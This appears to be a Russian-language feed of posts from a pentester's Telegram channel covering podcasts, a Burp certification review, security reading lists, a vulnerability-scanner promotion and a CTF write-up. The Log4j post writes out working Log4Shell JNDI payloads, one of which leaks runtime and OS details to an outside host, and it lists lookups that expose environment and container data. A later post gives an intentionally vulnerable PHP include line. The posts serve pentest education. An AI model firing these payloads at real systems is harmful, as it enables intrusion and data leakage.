Снова здраствуйте!

😉 Как будет выглядеть The Standoff 365?

В шестом выпуске подкаста Mastertalk Егор Богомолов разговаривает с Ярославом Бабиным о карьере в offensive и будущем The Standoff.

Ярослав Бабин — руководитель отдела анализа защищенности Positive Technologies и один из ключевых организаторов The Standoff. Сейчас его компания готовит к запуску платформу The Standoff 365. В новом выпуске вы узнаете:

⚡️ зачем становиться руководителем в ИБ;
⚡️ почему иногда важно не получить свою первую работу;
⚡️ как выглядит сотрудничество с осознанными клиентами;
⚡️ как будет устроен The Standoff 365;
⚡️ зачем новая платформа компаниям.

Если вы давно интересовались темой турнира The Standoff или сами хотите поучаствовать, этот выпуск — ваш шанс узнать больше.

Статическими майндмапами и аггрегаторами инфы уже никого не удивишь.

Подъехал пополняемый формат знаний о пентесте и все вокруг него:

https://www.mindmeister.com/ru/1756305170?t=I99P4f4KNO

Log4j

Хотел донести до тех, кто как и я не сразу узнал про различные трюки в уязвимости Log4Shell. А конкретно о том, как красиво и правильно подтвердить уязвимость в Log4j, когда при эксплуатации прилетает только DNS запрос вашего доменного имени. (Ведь это может быть False-Positive, в случае если какой-нибудь WAF или еще что-нибудь видит в трафике домен и запрашивает его для проверки.

При эксплуатации уязвимости вектор приводящий к возможности выполнения кода через сборку вашего внешнего объекта выглядит следующим образом:

- Для поиска объекта через LDAP: ${jndi:ldap://empty.jack.su/exploit}
- Или тоже самое для RMI: ${jndi:rmi://empty.jack.su/exploit}

Следует отметить, что здесь конструкции ${...} называются Lookup'ы. (Их много и они разные: https://logging.apache.org/log4j/2.x/manual/lookups.html) Они используются в Log4j для получения различной информации из окружения приложения и подстановки ее в конфигурацию Log4j. Lookup'ы могут быть вложенными. Т.е. можно сформировать следующую конструкцию ${lower:${base64:ZW10cHkuamFjaw==}}, что сначала раскодирует значение в Base64, а потом переведет его в нижний регистр.

Соответственно, если у вас не удается получить LDAP/RMI запрос на свой сервер, первое что можно сделать, это проверить не фильтруется ли трафик по определенным портам. А значит, перебираем возможные порты в нашей конструкции:

${jndi:ldap://empty.jack.su:3333/exploit}

Если запрос не пришел, но вы видите, что DNS запрос имени происходит, проверьте можете ли вы создать DNS имя, которое позволит вам вытащить какие-нибудь данные из окружения приложения, например:

${jndi:ldap://empty-${java:runtime}-${java:vm}-${java:os}-empty.jack.su:3333/exploit}

Также в случае каких-либо еще вопросов к вашему случаю с детектом Log4j, попробуйте банально поломать схему обращения и посмотреть появится ли DNS запрос (**помните, что DNS имена нужно постоянно изменять, т.к. они кешируются**):

${jndi:asdf://empty123.jack.su/exploit}

Если DNS запрос все еще приходит, значит дело не в Log4j, а в каком либо компоненте системы, который выдергивает все доменные имена из трафика и проверяет их.

Интересные Lookup’ы из мана по Log4j Lookups:

${docker:containerName}
${docker:imageName}
${env:USER}
${env:HOME}
${env:PWD}
${java:version}
${java:runtime}
${java:os}
${docker:hostIp}
${docker:host}
${docker:accountName}
${docker:clusterName}
${docker:podName}
${docker:masterUrl}
${spring:spring.application.name}
${sys:logPath}
${web:rootDir}
${web:serverInfo}

Если вы знаете еще что-то интересное, welcome в комментарии под постами!;)

XSignal

Мои знакомы создали интересный продукт. Продукт XSignal - это облачный сканер уязвимостей внешнего периметра сетевой инфраструктуры.

Но что в нем особенного?

Пользователь лицензии сразу после скана, может внутри личного кабинета выбрать Эксперта по ИБ/Пентестера, с которым может связаться для работы над найденной уязвимостью. Специалист может помочь проверить ее, дать детальные рекомендации и объяснить суть уязвимости, выполнить работу по перепроверке или вообще провести работы по анализу защищенности за вознаграждение.

Т.е. внутри находится маркетплейс со специалистами, где вы видите их рейтинг, отзывы, цены на время специалиста, его опыт, сертификации и пр.

Как мне кажется, это очень интересная особенность продукта, особенно для компаний среднего и малого бизнеса, которые могут проверить самое критичное место в свой ИТ-инфраструктуре (ее внешний периметр) и сразу же найти проверенного исполнителя заплатив ему всего за несколько часов работы, что будет стоить несоразмерно меньше, чем любой из возможных пентестов от аудиторов.

Но сюда я пишу не только для того, чтобы рассказать о нем потенциальным клиентам, но для того, чтобы рассказать о возможностях партнерства моим коллегам пентестерам.

Пентестеры могут присоединить к этой платформе, где будут размещены их профили для взаимодействия с ними, получат сканер в бесплатное использование и смогут получать вознаграждения за пополнение базы сканера полезностями.

Если у вас есть вопросы по сотрудничеству как со стороны использования сканера, так и со стороны партнерства, пишите: @gorbunov_me

До 31 января 2022 года действует спец. предложение (первым 50 клиентам, оплатившим годовую подписку):
1) Сделают бесплатно под ключ интеграцию в CI/CD (битбакет, гитхаб, гитлаб)
2) Дадут скидку в 50% от стоимости.

Burp Suite Certified Practitioner

Ссылка на курс:

https://portswigger.net/web-security/certification

Минимальная стоимость:

99$

Для кого сертификат:

Для специалистов по безопасности веб-приложений и любых приложений работающих с HTTP протоколами

Сложность (субъективно):

Средняя

Proctoring:

Есть (Первые 15 минут для идентификации личности)

Формат экзамена:

Экзамен длится 4 часа. Вам дается два веб-приложения с 3-мя этапами эксплуатации в каждом.

1. Получение низкопривилегированной учетной записи. 
2. Повышение привилегий до уровня администратора.
3. Получение доступа к файловой системе или исполнению команд ОС.

Задачи в курсе достаточно “задротские”, не все даже топовые специалисты могут решить с первого раза, т.к. весьма высоко влияние того какие приложения в какой конфигурации выпадут. Основные проблемы возникают при невнимательном изучении приложения, где все может зависит от одного символа или слова появляющегося в ответе. 

В задачах могут выпасть любые уязвимости из списка уязвимостей в PortSwigger Academy, в том числе изощренные Request Smuggling, CSTI (DOM-based XSS), OOB в XXE и пр. Если на них не набита рука, придется потратить время чтобы нахватать ошибок при реализации векторов атак.

Ключевая отличительная особенность заданий в экзамене от тех задач, что вы проходили при подготовке - это правила фильтрации (WAF) и изощренные случаи реализации приложений, которые могут сбить с толку и быть основной сложностью. 

Необходимость продления и условия:

5 лет действует, продлевается при пересдаче.

Подготовка и материалы:

Все подготовительные материалы есть в открытом доступе и до покупки курса в Академии PortSwigger (https://portswigger.net/web-security). Также авторы сертификации предоставляют возможность попрактиковаться в сдаче экзамена на одном примере приложения: https://portswigger.net/web-security/certification/practice-exam. Оно достаточно хорошо служит примером того, что вы встретите на экзамене. Также обязательно прочесть гайд перед сдачей экзамена: https://portswigger.net/web-security/certification/how-it-works#what-the-exam-involves

Комментарий сдавшего:

Сдавал в 2021 году. Вошел в первую сотню сдавших по миру. Довелось сдавать еще трех часовую версию экзамена. Экзамен действительно непростой. Если человек сдал его вообще без подсказок со стороны - это означает что он очень хорошо понимает типовые уязвимости веба в различных кейсах и у него набита рука на эксплуатацию, а самое важное он умеет замечать мельчайшие детали.
Более подробно описываю свои комментарии в сообщениях: https://news.1rj.ru/str/YAH_Channel/451
https://news.1rj.ru/str/YAH_Channel/454 

Автор рецензии и владелец сертификата:

Егор Богомолов (@empty_jack)

#certificate

С новым годом, всех увлечённых хакингом и не только! 🎅

Это был блестящий год, следующий будет ещё лучше;)
Главное: не теряйте огня в глазах, делайте то, что любите, знайте чего хотите и будь что будет!

Всех коллег по цеху поздравляю особенно!👨🏼‍💻 Под конец года нам надарили классных подарков;) желаю, чтобы они вам пригодились!

С началом нового года!

Забыли самый интересный канал про хакинг добавить...

Но подборочка норм.

Праздничные дни — это время не только отдохнуть, но и прокачать свои знания и скилы 💪🎓 Поэтому мы подготовили для вас несколько подборок интересных и полезных материалов от наших экспертов.

Первая подборка — от Николая Анисени, руководителя группы исследований безопасности мобильных приложений PT SWARM. В Positive Technologies он занимается аудитом мобильных приложений для Android и iOS, а также анализом защищенности веб-приложений, в том числе банковских, и систем дистанционного банковского обслуживания. Николай — опытный исследователь, отмеченный в залах славы Google, Microsoft, Яндекс, Instagram, Valve, Reddit, Evernote и других мировых компаний. Участвует в подготовке ежегодного форума PHDays, в прошлом — участник CTF в составе команды SiBears.

Читайте и практикуйтесь!

📝 Форум месяца:

CTF TIME — Открытые соревнования по практической безопасности с разборами.

📚 Базы знаний:

HowToHunt — Рекомендации по поиску уязвимостей.
Pentest Book — Пентест и сценарии проникновения.
HackTricks — Хакерские приемы и техники.

🌐 Telegram-каналы и чаты:

Android Guards — Безопасность Android-устройств и приложений.
Hack3rScr0lls — Красивые схемы по тестированию.
The Bug Bounty Hunter — Все о Bug Bounty.
Android Security & Malware — Новости ИБ с уклоном в мобилки.
Mobile AppSec World — Безопасность мобильных приложений.

🌌 Вселенная GitHub:

All About Bug Bounty — Все о Bug Bounty.
Payloads All The Things — Пейлоады и байпасы для веб-приложений.
31 Days of API Security Tips — Советы по тестированию API.
MindAPI — Бесплатный Mindmap по тестированию API.

🐦 За кем следить в Twitter:

Sergey Toshin — Хакер #1 в Google Play Security Rewards Program.

А тут про толковые каналы не забыли ;)

Что делать в праздничные дни? Просто отдыхать и смотреть сериалы — скучно 🥱 Другое дело — совместить приятное с полезным и посвятить свободное время любимой сфере.

Именно поэтому наш эксперт Ярослав Бабин, руководитель отдела анализа защищенности приложений PT SWARM, подготовил для вас подборку материалов о практической безопасности, уязвимостях и атаках на веб-приложения.

В Positive Technologies Ярослав занимается аудитом финансовых и веб-приложений, а также АТМ (анализом защищенности банкоматов) и OSINT (разведкой по открытым источникам). Специализируется на изучении методов социальной инженерии, знает все о проблемах и уязвимостях онлайн-банков. Отмечен в залах славы Adobe, Яндекс, Mail.Ru и других известных компаний как ведущий исследователь. Один из организаторов кибербитвы The Standoff и форума по практической безопасности Positive Hack Days. В прошлом — багхантер в Яндекс, Mail.Ru, Mozilla и участник CTF-команды Antichat.

Читайте, слушайте, развивайтесь!

📝 Форумы и блоги: The SQL Injection Knowledge Base, RDot, ANTICHAT, CTF.Antichat, WebSec, Reverse Engineering

🔉 Полезные подкасты про OSINT и практическую безопасность: The Privacy, Security, and OSINT Show, Hack me, если сможешь, Мимокрокодил

📖 Книга месяца: Dafydd Stuttard. Marcus Pinto. The Web Application. Hacker's Handbook

🥼 Курсы и лабы по веб-безопасности: Hacker101, WebSecurityAcademy, PEN-200, Hack The Box, Root Me

📚 Руководства по тестированию: OWASP Mobile Security Testing Guide, OWASP Web Security Testing Guide

🕸 Полезные Telegram-каналы: Кавычка, YAH

🐦 За кем следить в Twitter: Timur Yunusov, James Kettle, PT SWARM, Nicolas Grégoire, Orange Tsai, LiveOverflow, wvu, Sergey Bobrov, James Forshaw, Frans Rosén, rvrsh3ll, Ben Hawkes, Maxim Goryachy, Michael Stepankin

👥 Встречи с единомышленниками: 2600, группы по DEFCON в Москве и других городах

Nominations are now open for the top 10 new web hacking techniques of 2021!

https://portswigger.net/research/top-10-web-hacking-techniques-of-2021-nominations-open

Открыта номинация десяти лучших техник атак на веб-приложения 2021-го года. Уже представлены десятки интересных техник атак. Для всех увлечённых уязвимостями веб-приложений, крайне рекомендую изучать примеры из этих списков и следить за этим проектом. Публикуемые в нем техники становятся трендами на ближайшие несколько лет!

Web power! ;)

#PHP #Nginx #procFS

Зачем я прошу стажеров разобраться в procFS и рассказать мне о ней?

Link: https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/

Кратко:
У вас есть Nginx + PHP с одной строкой кода:

<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');

Доп. условие:

chown -R root:root /tmp /var/tmp /var/lib/php/sessions && \
chmod -R 000 /tmp /var/tmp /var/lib/php/sessions

ln -sf /dev/stdout /var/log/nginx/access.log && \
ln -sf /dev/stderr /var/log/nginx/error.log

Как получить исполнение произвольного кода через include_once?

Ответ:
1. Найти в Nginx момент в котором создаётся и удаляется временный файл, создающийся в случае если тело запроса больше размера буфера (8KB или 16KB).

ngx_open_tempfile(u_char *name, ngx_uint_t persistent, ngx_uint_t access)
{
ngx_fd_t fd;

fd = open((const char *) name, O_CREAT|O_EXCL|O_RDWR, # Открываем файл
access ? access : 0600);

if (fd != -1 && !persistent) {
(void) unlink((const char *) name); # в тот же момент удаляем файл
}

return fd;
}

2. Найти PID'ы Nginx воркеров
3. Успеть найти созданный временный файл среди открытых Nginx'ом файловых дескрипторов, пока он не был закрыт.
4. Учесть еще пригоршню мелочей.

Вы прекрасны!

Реверс шелл

Наконец-то можно не хранить все эти тонны подсказок в своих заметках о том, как делать бинд\реверс шеллы в разных ситуациях.

https://www.revshells.com/

Наслаждайтесь!

Для англоговорящих подписчиков;)

Перевели статью по автоматизации действий в BurpSuite.

https://hackmag.com/security/burp-stepper-intruder/

И кстати, 2000 фоловеров!)

Будем держать марку и дальше. По такому поводу предлагаю в комментах написать про что писать большее статей. Посмотрим, что вам интересно, и будем наращивать обороты;)

REvil

“ФСБ объявила о задержании членов хакерской группы REvil после обращения властей США”

У меня есть одно предположение почему это фейк…

Ни один уважающий себя хакер, не станет работать на таких ноутбуках :D

А что думаете вы? Го в комменты!